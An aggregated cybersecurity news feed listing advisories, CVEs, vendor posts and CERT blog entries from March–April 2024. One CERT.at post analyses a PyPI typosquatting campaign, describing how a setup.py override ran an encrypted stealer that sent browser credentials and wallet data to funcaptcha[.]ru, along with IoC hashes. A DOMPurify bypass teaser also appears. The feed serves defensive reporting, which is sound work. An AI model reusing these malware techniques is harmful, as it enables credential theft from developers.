Security Alert (A24-04-05): Multiple Vulnerabilities in Microsoft Edge
2024-04-05T04:00:00Z | 1712289600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-06): Multiple Vulnerabilities in Cisco Products
2024-04-05T04:00:00Z | 1712289600

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Keep Your Tech Flame Alive: Akamai Trailblazer Alex Virley
2024-04-04T13:00:00Z | 1712235600

https://www.akamai.com/blog/culture/2024/apr/keep-your-flame-alive-akamai-trailblazer-alex-virley
Cisco and BoA to Host Tech Talk on Security from RSA 2024
2024-04-04T12:00:00Z | 1712232000

Cisco today announced that it will participate in the following event with the financial community.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m04/cisco-and-boa-to-host-tech-talk-on-security-from-rsa-2024.html
Vulnerability in Apaczka plugin for PrestaShop
2024-04-04T11:00:00Z | 1712228400

Improper Access Control vulnerability (CVE-2024-2759) has been found in Apaczka plugin for PrestaShop.

https://cert.pl/en/posts/2024/04/CVE-2024-2759/
The National Cyber Security Centre Finland’s weekly review – 13/2024
2024-04-04T06:43:17Z | 1712212997

This week, our topics include how to securely manage domain names and the upcoming Hack the Networks hackathon.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-132024
The National Cyber Security Centre Finland’s weekly review – 13/2024
2024-04-04T06:43:17Z | 1712212997

This week, our topics include how to securely manage domain names and the upcoming Hack the Networks hackathon.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-132024
Ettevõtte andmebaasist laeti ebaseaduslikult alla Apotheka kliendikaartide omanike andmeid
2024-04-04T05:24:05Z | 1712208245

Apteegi- ja haiglakaupadega tegelev ettevõte Allium UPI teavitas veebruaris, et nende hallatud kliendikaardisüsteemi on ebaseaduslikult sisenetud ja laetud alla klientide isikukoode, ostuandmeid ning kontaktandmeid. Asjaolud selgitatakse alustatud kriminaalmenetluse ja järelevalvemenetluse käigus.

https://ria.ee/uudised/ettevotte-andmebaasist-laeti-ebaseaduslikult-alla-apotheka-kliendikaartide-omanike-andmeid
Graylog and SOC Prime Form Strategic Partnership to Make Threat Detection and Response More Effective and Efficient
2024-04-03T13:03:26Z | 1712149406

FOR IMMEDIATE RELEASE   Collaboration significantly enhances enterprise cybersecurity posture within hours   HOUSTON and BOSTON – April 3, 2024—Graylog, a leader in SIEM, Enterprise Log Management and API Security, together with SOC Prime, provider of the foremost platform for collective cyber defense, today unveiled their strategic technology partnership. Now available in beta, this collaboration […] The post Graylog and SOC Prime Form Strategic Partnership to Make Threat Detection and Response More Effective and Efficient appeared first on Graylog.

https://graylog.org/news/graylog-and-soc-prime-form-exclusive-partnership/
KeyTrap Highlights Need for Enduring DNS Defenses for Service Providers
2024-04-03T13:00:00Z | 1712149200

DNS resolvers must be highly resilient to malicious activity like DoS attacks and cache poisoning. Akamai CacheServe delivers enduring defenses.

https://www.akamai.com/blog/security/2024/apr/keytrap-highlights-need-enduring-dns-defenses-service-providers
Welcome to 2024: A Year in Review with Akamai Hunt
2024-04-03T13:00:00Z | 1712149200

https://www.akamai.com/blog/security/2024/apr/a-year-in-review-with-akamai-hunt
Security Alert (A24-04-02): Multiple Vulnerabilities in Google Chrome
2024-04-03T04:00:00Z | 1712116800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Open Automation Software OAS Platform OAS Engine Tags Configuration file write vulnerability
2024-04-03T00:00:00Z | 1712102400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1950
Open Automation Software OAS Platform OAS Engine User Configuration improper input validation vulnerability
2024-04-03T00:00:00Z | 1712102400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1949
Open Automation Software OAS Platform OAS Engine File Data Source Configuration denial of service vulnerability
2024-04-03T00:00:00Z | 1712102400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1948
Open Automation Software OAS Platform OAS Engine Save Security Configuration file write vulnerability
2024-04-03T00:00:00Z | 1712102400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1951
SS8 Expands Acceler8 Partnership Program
2024-04-02T13:05:41Z | 1712063141

Comprehensive Program Helps Partners Differentiate and Grow Business MILPITAS, Calif. – April 02, 2024 – SS8 Networks, a leader in Lawful and Location Intelligence and Monitoring Suite platforms, today announced the expansion of their Acceler8 program to specialized Govtech partners, which will allow the company to continue its expansion into international government and intelligence agencies. […] The post SS8 Expands Acceler8 Partnership Program appeared first on SS8.

https://www.ss8.com/ss8-expands-acceler8-partnership-program/
The Sustainability Team Is Listening. Here?s What We Heard.
2024-04-02T13:00:00Z | 1712062800

https://www.akamai.com/blog/sustainability/2024/apr/the-sustainability-team-is-listening
On Cybersecurity Alert Levels
2024-04-02T12:57:46Z | 1712062666

Last week I was invited to provide input to a tabletop exercise for city-level crisis managers on cyber security risks and the role of CSIRTs. The organizers brought a color-coded threat-level sheet (based on the CISA Alert Levels) to the discussion and asked whether we also do color-coded alerts in Austria and what I think of these systems. My answer was negative on both questions, and I think it might be useful if I explain my rationale here. The first was rather obvious and easy to explain, the second one needed a bit of thinking to be sure why my initial reaction to the document was so negative. Escalation Ratchet The first problem with color-coded threat levels is their tendency to be a one-way escalation ratchet: easy to escalate, but hard to de-escalate. I’ve been hit by that mechanism before during a real-world incident and that led me to be wary of that effect. Basically, the person who raises the alert takes very little risk: if something bad happens, they did the right thing, and if the danger doesn’t materialize, then “better safe than sorry” is proclaimed, and everyone is happy, nevertheless. In other words, raising the threat level is a safe decision. On the other hand, lowering the threat level is an inherently risky decision: If nothing bad happens afterwards, there might be some “thank you” notes, but if the threat materializes, then the blame falls squarely on the shoulders of the person who gave the signal that the danger was over. Thus, in a CYA-dominated environment like public service, it is not a good career move to greenlight a de-escalation. We’ve seen this process play out in the non-cyber world over the last years, examples include Terror threat level after 9/11 Border controls in the Schengen zone after the migration wave of 2015 Coming down from the pandemic emergency That’s why I’ve always been pushing for clear de-escalation rules to be in place whenever we do raise the alarm level. Cost of escalation For threat levels to make sense, any level above “green” need to include a clear guidance what the recipient of the warning should be doing at this threat level. In the example I saw, there was a lot of “Identify and patch vulnerable systems”. Well, D'oh! This is what you should be doing at level green, too. Thus, relevant guidance at higher level needs to be more than “protect your systems and prepare for attacks”. That’s a standing order for anyone doing IT operation, this is useless advice. What people need to know is what costs they should be paying in exchange for a better preparation against the current threat. This could be a simple thing like “We expect a patch for a relevant system to be released out of our office-hours tonight, we need to have a team on standby to react as quickly as possible, and we’ve willing to pay for the overtime work to have the patch deployed ASAP”. Or the advice could be “You need to patch this outside your regular patching cadence, plan for a business disruption and/or night shifts for the IT people”. At the extreme end, it might even be “we’re taking service X out of production, the changes to the risk equation mean that its benefits can’t justify the increased risks anymore”. To summarize: if there were no hard costs to a preventative security measure, then you should have implemented them a long time ago, regardless of any threat level board. Counterpoint There is definitely value in categorizing a specific incident or vulnerability in some sort of threat level scheme: A particularly bad patch day, or some out-of-band patch release by an important vendor certainly is a good reason that the response to the threat should also be more than business as usual. But a generic threat level increase without concrete vulnerabilities listed or TTPs to guard against? That’s just a fancy way of saying “be afraid” and there is little benefit in that. Postscript: Just after posting this article, I stumbled on a fediverse post making almost the same argument, just with April 1st vs. the everyday flood of misinformation.

https://www.cert.at/en/blog/2024/4/on-cybersecurity-alert-levels
How Cato Uses Large Language Models to Improve Data Loss Prevention
2024-04-02T09:05:27Z | 1712048727

Cato Networks has recently released a new data loss prevention (DLP) capability, enabling customers to detect and block documents being transferred over the network, based on sensitive categories, such as tax forms, financial transactions, patent filings, medical records, job applications, and more. Many modern DLP solutions rely heavily on pattern-based matching to detect sensitive information.... The post How Cato Uses Large Language Models to Improve Data Loss Prevention appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-cato-uses-large-language-models-to-improve-data-loss-prevention/
In memoriam: Prof. Ross Anderson
2024-04-02T09:00:00Z | 1712048400

We were very sorry to learn of the passing of Professor Ross Anderson a few days ago. Read more

https://www.virusbulletin.com/blog/2024/04/memoriam-prof-ross-anderson/
Announcing Flow-IPC, an Open-Source Project for Developers to Create Low-Latency Applications
2024-04-02T05:30:00Z | 1712035800

https://www.akamai.com/blog/developers/2024/apr/flow-ipc-introduction-low-latency-cpp-toolkit
High Threat Security Alert (A24-03-24): Vulnerability in XZ Utils
2024-04-02T04:00:00Z | 1712030400

A malicious backdoor is found embedded in versions 5.6.0 and 5.6.1 of XZ Utils.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-04-01): Multiple Vulnerabilities in Android
2024-04-02T04:00:00Z | 1712030400

Google has released Android Security Bulletin April 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Defending Your Hybrid Enterprise Requires You to Break the “Spiral of More.” by Mark Wojtasiak
2024-04-02T00:00:00Z | 1712016000

Unrivaled signal clarity and rapid response can help you protect your complex IT environment.

https://www.vectra.ai/blog/hybrid-enterprise-requires-you-to-break-the-spiral-of-more
Vectra AI Threat Briefing: Scattered Spider by Vectra AI Product Team
2024-04-02T00:00:00Z | 1712016000

Learn about the attacker group Scattered Spider, how they operate, and how Vectra AI helps you defend against their hybrid attack techniques.

https://www.vectra.ai/blog/vectra-ai-scattered-spider
NetNoiseCon: Amplifying the Future of InfoSec
2024-04-02T00:00:00Z | 1712016000

GreyNoise is announcing the launch of NetNoiseCon, an online conference series hosted by GreyNoise aimed at advancing InfoSec education and fostering community collaboration, featuring technical talks and career advice from industry experts.

https://www.greynoise.io/blog/netnoisecon-amplifying-the-future-of-infosec
Volt Typhoon Threat Report
2024-04-01T21:38:41Z | 1712007521

Threat Overview On March 19, 2024, CISA, along with other participating agencies, released a joint Fact Sheet warning executive leaders in the critical infrastructure sector that Volt Typhoon has strategically pre-positioned itself to conduct cyber attacks against US infrastructure. In the event of escalating tension between the US and China, leaders are encouraged to take all the necessary precautions against this urgent risk to protect critical infrastructure networks.Volt Typhoon is a People’s Republic of China (PRC) state-sponsored advanced persistent threat group reportedly active since 2021. This group specializes in cyber espionage operations, specifically targeting the Communications, Energy, Transportation Systems, and Water and Wastewater Systems sectors.

https://www.ironnet.com/blog/volt-typhoon-threat-report
XZ Utils Backdoor ? Everything You Need to Know, and What You Can Do
2024-04-01T16:00:00Z | 1711987200

https://www.akamai.com/blog/security-research/2024/apr/critical-linux-backdoor-xz-utils-discovered-what-to-know
XZ Backdoor / RCE (CVE-2024-3094) is the Biggest Supply Chain Attack Since Log4j
2024-04-01T15:22:36Z | 1711984956

A severe backdoor has been discovered in XZ Utils versions 5.6.0 and 5.6.1, potentially allowing threat actors to remotely access systems using these versions within SSH implementations. Many major Linux distributions were inadvertently distributing compromised versions. Consult your distribution’s security advisory for specific impact information. While the attacker’s identity and motivation remain unknown, the sophisticated... The post XZ Backdoor / RCE (CVE-2024-3094) is the Biggest Supply Chain Attack Since Log4j appeared first on Cato Networks.

https://www.catonetworks.com/blog/xz-backdoor-rce-cve-2024-3094-is-the-biggest-supply-chain-attack-since-log4j/
Our People and Our Growth: Key Drivers of Akamai?s ESG Strategy
2024-04-01T13:00:00Z | 1711976400

https://www.akamai.com/blog/culture/2024/apr/key-drivers-of-akamais-esg-strategy
Outsmarting Cyber Threats: Etay Maor Unveils the Hacker’s Playbook in the Cloud Era
2024-04-01T10:50:31Z | 1711968631

This blog post is based on research by Avishay Zawoznik, Security Research Manager at Cato Networks. The Cloud Conundrum: Navigating New Cyber Threats in a Digital World In an era where cyber threats evolve as rapidly as the technology they target, understanding the mindset of those behind the attacks is crucial. This was the central... The post Outsmarting Cyber Threats: Etay Maor Unveils the Hacker’s Playbook in the Cloud Era appeared first on Cato Networks.

https://www.catonetworks.com/blog/outsmarting-cyber-threats-etay-maor-unveils-the-hackers-playbook-in-the-cloud-era/
RIA peadirektori asetäitjaks riigi infosüsteemi alal saab Taavi Ploompuu
2024-04-01T07:37:18Z | 1711957038

Riigi Infosüsteemi Ameti (RIA) peadirektori asetäitjana riigi infosüsteemi alal asub tänasest, 1. aprillist tööle senine personaalriigi osakonna juht Taavi Ploompuu.

https://ria.ee/uudised/ria-peadirektori-asetaitjaks-riigi-infosusteemi-alal-saab-taavi-ploompuu
Bypassing DOMPurify with good old XML
2024-04-01T00:00:00Z | 1711929600

Introduction Hello, I’m RyotaK ( @ryotkak ), a security engineer at Flatt Security Inc. Recently, @slonser_ found a bypass in the DOMPurify when it’s used to sanitize XML documents. After taking a look at the patch, I found two more bypasses of XML/HTML confusion, so I’m documenting it here. HTML != XML As @slonser_ wrote in his post, HTML and XML have a bit different parsing rules. For example, the following text is parsed as a single node in the XML parser, but the HTML parser recognizes the h1 tag.

https://flatt.tech/research/posts/bypassing-dompurify-with-good-old-xml/
Introducing Ruzzy, a coverage-guided Ruby fuzzer
2024-03-29T13:30:44Z | 1711719044

Trail of Bits is excited to introduce Ruzzy, a coverage-guided fuzzer for pure Ruby code and Ruby C extensions. Fuzzing helps find bugs in software that processes untrusted input. In pure Ruby, these bugs may result in unexpected exceptions that could lead to denial of service, and in Ruby C extensions, they […]

https://blog.trailofbits.com/2024/03/29/introducing-ruzzy-a-coverage-guided-ruby-fuzzer/
Winning the 10G Race with Cato
2024-03-29T07:30:00Z | 1711697400

The Need for Speed The rapidly evolving technology and digital transformation landscape has ushered in increased requirements for high-speed connectivity to accommodate high-bandwidth application and service demands.  Numerous use cases, such as streaming media, internet gaming, complex data analytics, and real-time collaboration, require we go beyond today’s connectivity trends to define new ones.  Our ever-changing... The post Winning the 10G Race with Cato appeared first on Cato Networks.

https://www.catonetworks.com/blog/winning-the-10g-race-with-cato/
When SASE-based XDR Expands into Network Operations: Revolutionizing Network Monitoring
2024-03-28T16:15:23Z | 1711642523

Cato XDR breaks the mold: Now, one platform tackles both security threats and network issues for true SASE convergence. SASE, or Secure Access Service Edge, represents the core evolution of today’s enterprise networks converging network and security functions into a single, unified, cloud-native architecture. Today’s global work-from-anywhere model amplifies this need for IT to have... The post When SASE-based XDR Expands into Network Operations: Revolutionizing Network Monitoring appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-based-xdr-expands-into-network-operations/
Hobby hunter notes: PyPI under attack
2024-03-28T14:16:01Z | 1711635361

When I wrap up at CERT.at, where I mostly work on our notification system (if you’re a network operator in Austria and got a misassigned notification about some security issues – I might have been involved in that), I sometimes change my hat and explore other “cyber”-security areas, especially looking for malicious packages in PyPI, a standard Python package repository. The short summary is: there are a lot of them – but also, don’t panic. It’s happening now Let’s start with a rough analysis of a recent campaign that could be named “funcaptcha.” According to records I was able to access, it started the day before yesterday (26th March) with a package called “schubismomv3”, but a post on Twitter [0] suggests there might have already been more by the time this gained my attention. As per my findings, the first version of the package was published around 18:00 on March 26th (all timestamps are UTC+1), starting without any active malicious content, but included hate speech and used the name of a well-known security researcher [0]. A sample from first version of “schubismomv3” package Over multiple iterations with an apparently “trial and error” approach (Have you heard about testing your software locally? Or a test environment? No? Sorry, I might be biased. I’m primarily a developer.) we ended up with version 1.10.0 published around 20:30. It used classic methods: the setup.py script was configured with a custom installation command overriding the default during the installation on Windows OS, a sub process was started with an encrypted script inside the malicious script used the “Fernet” encryption library to avoid automated de-obfuscation. Final version of “schubismomv3” – overriding the installation command The obfuscated code performed a  number of tasks typical for information stealers, such as exfiltrating cookies and passwords from web browsers, but also looked for browser extensions and applications related to cryptocurrencies, documents with names indicating that they contained secret information (Do you name your top-secret documents something like “seecret”?) and so on. All this information is then compressed and sent out to “funcaptcha[.]ru/delivery” (thus the name for the campaign). Afterwards, an interesting thing would happen: if the script detected an installation of Atomic Wallet [1], a cryptocurrency wallet app, it downloaded its own version, trying to replace the original. Finally, the next Python script was downloaded and put in the Windows start up directory. A sample from de-obfuscated code attempting to replace the original app I'll leave the deep analysis of these artifacts to others. Let's take a look at why this is a campaign, and not just a single malicious package, instead. As soon as “schubismomv3” was reported and removed (shortly after 21:00, according to the information I was able to gather), PyPI was flooded with similar packages, all displaying the same malicious activity. Initially, the threat actor used not exactly marketing friendly names, such as “insanepackagev1434” or “insanepackage217234234242423442983”. But later on they began to attempt to “typo-squat” popular packages, by creating and uploading packages which closely – but not exactly – mirrored the names of popular ones. A few examples were “reqzests”, “requetsa”, “py-cordd”, “py-coqrd”, “coloramza”, “corlorama”, “capmonstercloudclouidclient”, “piolow”, “bop-utils”, and many hundreds (!) more. The campaign continued until the early hours of March 28th, when PyPI administrators took the decision to temporarily suspend registration of new users and projects [14]. By then, more than 500 packages had been created. They are not alone… Looking at the few months I spent looking at PyPI, I can confidently say that the “funcaptcha” campaign might have been an exception in terms of the number of malicious packages involed – but it was not the only one. I observed a number of potentially malicious packages, with another recent case, “yocolor”, initially looking like a small thing on PyPI, but turning out to be a significantly bigger campaign targeting repositories on Github [2] [3]. A further number of suspicious packages didn't do anything harmful, but weren't what you wanted to get either – some were pentesting packages (they usually get removed very quickly), some were advertisements, some may be part of research efforts. Example command extracted from a package that is not harmful on its own, but you probably didn't want to share all of it ...but it’s also no reason to panic Everything I have written about is disturbing, but comparatively simple to catch. The methods are so popular (and obvious) that it's somewhat confusing to me. The threat actors must be aware that the chances of successfully compromising an actual, real world systems are slim to negligible. The reasonably expectable return on investment is far outweighed by the effort the attackers have put into these campaigns. The "funcaptcha" campaign is a good example - yes, their code contains functionality to exfiltrate data, as well as some more advanced techniques. But the initial infection vector – assuming that there aren't any further, undiscovered ones – exposes packages to quick detection and swift removal. Overriding the default install command is one of the first things that is being checked when a package is examined, and an external connection during installation is a pretty suspicious activity (although often a legitimate behavior). The attackers seemed to know all of this and didn't attempt to hide it – which is odd, unless the campaign was just a smokescreen. The first step was slightly modified in later packages, downloading the first malicious script from their domain instead of embedding it, and recording the name of the package. Example description of packages released in later stages of the “funcaptcha” campaign – it was what you would see in PyPI. I hope you wouldn't try to install such a package. PyPI Security Team The big role in securing your development environment against such attacks is played by PyPI. After a few attempts, the index decided against proactively hunting for malware years ago, instead investing in improving the handling of abuse reports. And they do it well. The team responds very quickly, sometimes taking down malicious packages in a matter of minutes. Last year, PyPI reached an important milestone by hiring its first official Safety & Security Engineer [4]. They are active and transparent about their work, conducting a security audit of the registry [5], explaining the abuse reporting process [6], and most recently improving the reporting channel, as well as launching a private beta of the reporting API [7]. This means that the PyPI, while under constant attack from threat actors, is leveraging the power of many researchers hunting for malicious packages. And it seems to work well, at least against threat actors using known methods. What does all of this mean for me? My personal opinion is that most of the cases we see in the security media and researchers' blog posts about malicious packages aren't the real threats we should be spending sleepless nights thinking about – we can leave that restlessness to advanced threats like backdoors in popular libraries, well hidden malicious actions which are only triggered under very specific conditions, and so on. The typical threats relying on obvious methods are more like the flu: we cannot ignore them, but we should get used to them and, most importantly, take basic precautions. These always depend on what you're trying to secure – don't forget to think about your threat modeling, even if it's basic! There are a few tips, useful not only for Python environments: Do. Not. Download. Random. Stuff. Really, that’s the most important thing. Malicious code is often hidden in low-quality packages, repositories in Github, and so on. Please pay attention to what you run on your computer. Use reputable dependencies. But be careful: the information in package registries, such as connected repositories or maintenance names, is often just a declaration. Instead, use external reputation services. There are a few free ones you can check (for example [8] [9]), as well as services that offer only verified dependencies for download. Keep your dependencies healthy. Scan them regularly for known vulnerabilities (including container images), and install security updates (not necessarily fully automated – that would open the door to other threats). You can use free or paid services, and your source hosting service probably already has something ready for painless integration. For example, you can check out osv.dev [10]. Install only what you need. You can think of your project's dependencies as an ingredient list: if the food item or beverage you're about to buy has a long list of ingredients you don't understand, you should probably think twice before eating it. Dependencies that you don't need, dependencies that have been used but are no longer used – all of those unnecessarily increase the risk of an incident. Think about reducing the data that your development environment has access to. Thread actors use malicious packages and repositories to target data on developer machines. Solutions such as development containers [11] can reduce the potential scope of a breach. Monitor test environments the same way as you would production. Advanced threats may not be easy to detect locally, but there is a chance that they will reveal their intentions in your test environments before they reach production. Monitoring outgoing connections can be helpful in catching them. Also: you probably also want to secure your test environments as production if they are accessed externally [12], and not leave your production data there, especially of former customers [13]. Stay safe I started by explaining a case from the PyPI world, but that was just an example. Developing software means relying on external dependencies, and it's great that we share common parts, especially when implementing complex solutions (Don't implement your own cryptography. Just don't.). Like everything, it brings its own risks, and we just have to be aware of them. And take precautions. And do not download random stuff. IoCs You can look for signs of “funcaptcha” by: funcaptcha[.]ru 0c1ddd33e630f4ac684880f0e673dfa84919272494c11da0f1ec05fb4f919ce8 – first of modified apps the script tried to inject abe19b0964daf24cd82c6db59212fd7a61c4c8335dd4a32b8e55c7c05c17220d – second modified app References [0] https://x.com/_JohnHammond/status/1772704618574705057?s=20 [1] https://atomicwallet.io/ [2] https://www.bleepingcomputer.com/news/security/hackers-poison-source-code-from-largest-discord-bot-platform/ [3] https://medium.com/@demonia/discovering-malwares-in-public-github-repositories-3e080f030ecc [4] https://blog.pypi.org/posts/2023-08-04-pypi-hires-safety-engineer/ [5] https://blog.pypi.org/posts/2023-11-14-1-pypi-completes-first-security-audit/ [6] https://blog.pypi.org/posts/2023-09-18-inbound-malware-reporting/ [7] https://blog.pypi.org/posts/2024-03-06-malware-reporting-evolved/ [8] https://deps.dev/ [9] https://securityscorecards.dev/ [10]  https://osv.dev/ [11] https://containers.dev/ [12] https://www.theverge.com/2024/1/26/24051708/microsoft-hack-russian-security-attack-senior-leadership-emails [13] https://niebezpiecznik.pl/post/dcg-centrum-medyczne-pokazuje-jak-nie-informowac-o-kradziezy-danych-pacjentow/  (Polish – data of a medical clinic stolen from the test environment of a vendor they have not worked with for a few years) [14] https://status.python.org/incidents/dc9zsqzrs0bv

https://www.cert.at/en/blog/2024/3/hobby-hunter-notes-pypi-under-attack
The Industry’s First SASE-managed EPP Has Arrived
2024-03-28T14:11:51Z | 1711635111

The post The Industry’s First SASE-managed EPP Has Arrived appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-industrys-first-sase-managed-epp-has-arrived/
Cisco news in 60 seconds: The latest in collaboration from Enterprise Connect 2024
2024-03-28T11:00:00Z | 1711623600

Catch up on some of Cisco's exciting announcements from Enterprise Connect 2024, including Webex integrations and unique devices made to improve productivity in hybrid work.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m03/cisco-news-in-60-seconds-the-latest-in-collaboration-from-enterprise-connect-2024.html
Honey, I Lost My Credentials! Finding Plaintext Credentials on the Internet
2024-03-28T05:00:00Z | 1711602000

https://www.akamai.com/blog/security-research/2024/mar/akamai-hunt-finds-plaintext-credentials-on-public-internet
Security Alert (A24-03-22): Multiple Vulnerabilities in Microsoft Edge
2024-03-28T04:00:00Z | 1711598400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-03-23): Multiple Vulnerabilities in Cisco Products
2024-03-28T04:00:00Z | 1711598400

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
What We're Reading: March 2024
2024-03-28T00:00:00Z | 1711584000

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

https://www.greynoise.io/blog/what-were-reading-march-2024
The National Cyber Security Centre Finland’s weekly review – 12/2024
2024-03-27T06:48:08Z | 1711522088

This week, we talk about the ‘Information security in 2023’ report and the exploration of cyber security topics in the Futucast podcast. In addition, we provide information on new guides concerning cloud services and minimum information security requirements.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-122024
The National Cyber Security Centre Finland’s weekly review – 12/2024
2024-03-27T06:48:08Z | 1711522088

This week, we talk about the ‘Information security in 2023’ report and the exploration of cyber security topics in the Futucast podcast. In addition, we provide information on new guides concerning cloud services and minimum information security requirements.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-122024
Security Alert (A24-03-21): Multiple Vulnerabilities in Google Chrome
2024-03-27T04:00:00Z | 1711512000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Cisco Furthers Customer Experience Momentum with New Offerings That Extend Customer Value
2024-03-26T15:00:00Z | 1711465200

Webex by Cisco helps agents deliver exceptional experiences, enhanced by AI with Cisco AI Assistant. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m03/webex-furthers-customer-experience-momentum-with-new-offerings-and-value-for-customers.html
Cisco and Ford Motor Company Rollout Webex App for Productivity on the Move
2024-03-26T15:00:00Z | 1711465200

Webex by Cisco elevates the in-vehicle workspace experience in Ford and Lincoln vehiclesMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m03/cisco-and-ford-motor-company-rollout-webex-app-for-productivity-on-the-move.html
Report: The State of Third-Party Risk Management
2024-03-26T13:49:16Z | 1711460956

Explore crucial findings in our latest white paper, drawing on insights from 112 risk management professionals. This pivotal study, a follow-up to our 2020 research, examines the complexities of expanding supply chains, increased third-party breaches, and escalating non-cyber risks. Discover why an overwhelming 90% of experts have shifted their focus to prioritize third-party risk management, marking a significant increase in its strategic importance.

https://blog.riskrecon.com/resources/reports-and-whitepapers/report-state-of-tprm-2024
CVE-2024-25138
2024-03-26T13:37:00Z | 1711460220

CWE-256: Plaintext Storage of a Password In Automation-Direct C-MORE EA9 HMI credentials used by the platform are stored as plain text on the device. AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78 Affected versions: C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

https://claroty.com/team82/disclosure-dashboard/cve-2024-25138
CVE-2024-25137
2024-03-26T13:36:00Z | 1711460160

CWE-121: Stack-based Buffer Overflow In Automation-Direct C-MORE EA9 HMI there is a program that copies a buffer of a size controlled by the user into a limited sized buffer on the stack which leads to a stack overflow. The result of this stack-based buffer overflow will lead to a denial-of-service conditions. AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78 Affected versions: C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

https://claroty.com/team82/disclosure-dashboard/cve-2024-25137
CVE-2024-25136
2024-03-26T13:35:00Z | 1711460100

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') There is a function in Automation-Direct C-MORE EA9 HMI that allows an attacker to send a relative path in the URL without proper sanitizing of the content. AutomationDirect recommends that users update C-MORE EA9 HMI to V6.78 Affected versions: C-MORE EA9 HMI EA9-T6CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T7CL: Version 6.77 and prior C-MORE EA9 HMI EA0-T7CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-T8CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T10WCL: Version 6.77 and prior C-MORE EA9 HMI EA9-T12CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL: Version 6.77 and prior C-MORE EA9 HMI EA9-T15CL-R: Version 6.77 and prior C-MORE EA9 HMI EA9-RHMI: Version 6.77 and prior C-MORE EA9 HMI EA9-PGMSW: Version 6.77 and prior

https://claroty.com/team82/disclosure-dashboard/cve-2024-25136
Customers Champion Akamai Security Solutions, Support, and Partnership
2024-03-26T13:00:00Z | 1711458000

https://www.akamai.com/blog/security/2024/mar/customers-champion-akamai-security-solutions
The Year of Security Platforms: Are You Ready?
2024-03-26T12:39:32Z | 1711456772

The post The Year of Security Platforms: Are You Ready? appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-year-of-security-platforms
Security Alert (A24-03-20): Vulnerability in Apple iOS and iPadOS
2024-03-26T04:00:00Z | 1711425600

Apple has released iOS 16.7.7, iOS 17.4.1, iPadOS 16.7.7 and iPadOS 17.4.1 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
A day in the life of a SOC analyst – and why you’ve got it all wrong by Zoey Chu
2024-03-26T00:00:00Z | 1711411200

The way security technologies work today is not working out for SOC analysts.

https://www.vectra.ai/blog/a-day-in-the-life-of-a-soc-analyst
